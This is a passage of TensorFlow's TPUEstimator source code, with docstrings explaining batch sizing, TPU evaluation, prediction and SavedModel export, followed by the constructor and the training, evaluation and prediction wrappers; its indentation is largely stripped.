TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
  prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
      'accuracy': tf.compat.v1.metrics.accuracy(
          labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
  usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
        EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
        and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
      use_tpu: A bool indicating whether TPU support is enabled. Currently, TPU
        training and evaluation respect this bit, but eval_on_tpu can override
        execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
        With V1, `export_saved_model()` adds rewrite() and
        TPUPartitionedCallOp() for the user; while in V2, the user is expected
        to add rewrite(), TPUPartitionedCallOp(), etc., in their model_fn. A
        helper function `inference_on_tpu` is provided for V2.
        brn_tpu_estimator.py includes examples for both versions, i.e.
        TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in
(tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
        raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 are supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
    # In the absence of an explicit `log_every_n_secs` config, if the
    # `iterations_per_loop` value is specified as time in seconds, enable
    # logging every n secs based on the `iterations_per_loop` value. This is a
    # trade-off to avoid an API change in the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
      Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
      # Setting the batch size in params first. This helps the user to have the
      # same input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
    has a stronger check. The parent class's check generates a confusing
    warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding
          # have been created on CPU, as the user might reinitialize those from
          # some checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding
          # have been created on CPU, as the user might reinitialize those from
          # some checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
            # Creates a dummy metric update_op for all metrics. Estimator
            # expects all metrics in `eval_metric_ops` to have an update_op and
            # calls them one by one. The real metric update_ops are invoked in
            # a separate thread. So, here we give Estimator the dummy op for
            # all metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
